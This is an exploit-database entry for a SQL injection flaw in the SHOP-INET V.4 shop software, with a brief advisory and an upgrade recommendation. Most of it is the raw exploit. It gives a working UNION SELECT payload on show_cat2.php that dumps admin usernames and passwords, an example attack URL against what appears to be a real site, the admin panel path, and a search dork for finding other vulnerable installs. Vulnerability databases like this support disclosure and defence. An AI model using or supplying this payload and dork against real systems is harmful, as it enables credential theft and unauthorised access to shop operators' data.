header-logo
Suggest Exploit
vendor:
Shop-Inet V.4
by:
FeDeReR

SHOP-INET V.4 Exploit

SHOP-INET V.4 is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries and gain access to unauthorized information.

Mitigation:

Upgrade to the latest version of SHOP-INET V.4
Source

Exploit-DB raw data:

# SHOP-INET V.4 Exploit
# Author: FeDeReR
# Home : Hacking.ge & darkc0de.com
# Email : FeDeReR@avoe.ge

#############################################

Exploit : target.com/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,password)+from+admin

Example :http://shop-inet.ru/shop/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,password)+from+admin

Admin CP: target/admin/

d0rk: inurl:show_cat2.php?grid=

official site: http://shop-inet.ru/

############################################

# milw0rm.com [2009-01-26]